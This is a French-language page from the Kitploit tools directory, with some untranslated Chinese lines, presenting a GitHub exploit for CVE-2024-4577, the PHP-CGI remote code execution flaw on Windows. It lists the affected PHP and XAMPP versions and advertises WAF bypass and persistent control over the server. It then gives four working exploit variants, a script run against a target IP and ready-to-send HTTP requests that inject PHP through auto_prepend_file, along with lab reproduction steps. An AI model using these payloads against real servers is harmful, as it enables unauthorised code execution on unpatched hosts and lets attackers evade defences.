Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577-PHP-RCE — Exploit pour CVE-2024-4577 PHP-CGI RCE sur Windows, avec contournement WAF et support SSRF. Fournit plusieurs variantes d'exploitation pour les scénarios par défaut, WAF et SSRF. | Kitploit
Outils/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFTests d'Intrusion
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

Exploit pour CVE-2024-4577 PHP-CGI RCE sur Windows, avec contournement WAF et support SSRF. Fournit plusieurs variantes d'exploitation pour les scénarios par défaut, WAF et SSRF.

Voir le dépôt
5il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4577-PHP-RCE

Présentation du projet et principe

  • Premier EXP au monde exploitant l'environnement PHP par défaut (XAMPP) pour la vulnérabilité CVE-2024-4577 PHP-CGI RCE.
  • Le tout premier exploit RCE PHP-CGI CVE-2024-4577 utilisant l'environnement PHP par défaut. Partage d'un exploit original, prend en charge SSRF, prend en charge le contournement WAF.
  • Réalise une RCE dans l'environnement PHP par défaut. Principe : cgi.force_redirect + REDIRECT-STATUS.
  • Nouvel exploit original, prend en charge la méthode de contournement WAF. Principe : création d'un serveur FastCGI + communication via le protocole FastCGI.
  • Nouvel exploit original, prend en charge la méthode pour les scénarios SSRF. Principe : protocole data:// + requête GET.

Avantages de l'EXP 1

  • RCE sans avoir besoin de allow_url_include, auto_prepend_file, auto_append_file. Permet d'inclure n'importe quel fichier et fichier PHP.
  • Les mots-clés allow_url_include, auto_prepend_file, auto_append_file, souvent bloqués par le WAF, n'apparaissent pas.
  • Toutes les communications du serveur FastCGI ne sont pas enregistrées par le WAF.
  • Écoute sur un nouveau port, assurant ainsi un contrôle persistant du serveur PHP, indépendamment d'Apache et de PHP.
  • Résumé de la vulnérabilité

    InformationsDétails
    Nom de la vulnérabilitéPHP RCE
    IdentifiantCVE-2024-4577
    Niveau de risqueÉlevé
    Type de vulnérabilitéRCE
    Difficulté d'exploitationFaible

    Versions affectées

    • PHP version Windows 8.3.0 <= versions affectées < 8.3.8
    • PHP version Windows 8.2.0 <= versions affectées < 8.2.20
    • PHP version Windows 8.1.0 <= versions affectées < 8.1.29
    • PHP version Windows versions affectées == 8.0.x
    • PHP version Windows versions affectées == 7.x
    • PHP version Windows versions affectées == 5.x
    • XAMPP version Windows 8.2.0 <= versions affectées <= 8.2.12
    • XAMPP version Windows 8.1.0 <= versions affectées <= 8.1.25
    • XAMPP version Windows versions affectées == 8.0.x
    • XAMPP version Windows versions affectées == 7.x
    • XAMPP version Windows versions affectées == 5.x

    EXP 1

    Utilisable dans les scénarios de contournement WAF + scénario par défaut :

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Exemple :

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Utilisable dans les scénarios SSRF + scénario par défaut :

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Utilisable dans le scénario par défaut :

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Utilisable dans le scénario par défaut :

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Reproduction

    1. Environnement serveur :
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. Téléchargement et installation de XAMPP sur le serveur :
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. Configuration du serveur
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. Utilisation de l'EXP côté client
    root@kitploit:~
    使用上述EXP进行测试
    
    1. Vérification
    root@kitploit:~
    观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
    
    Télécharger l’outil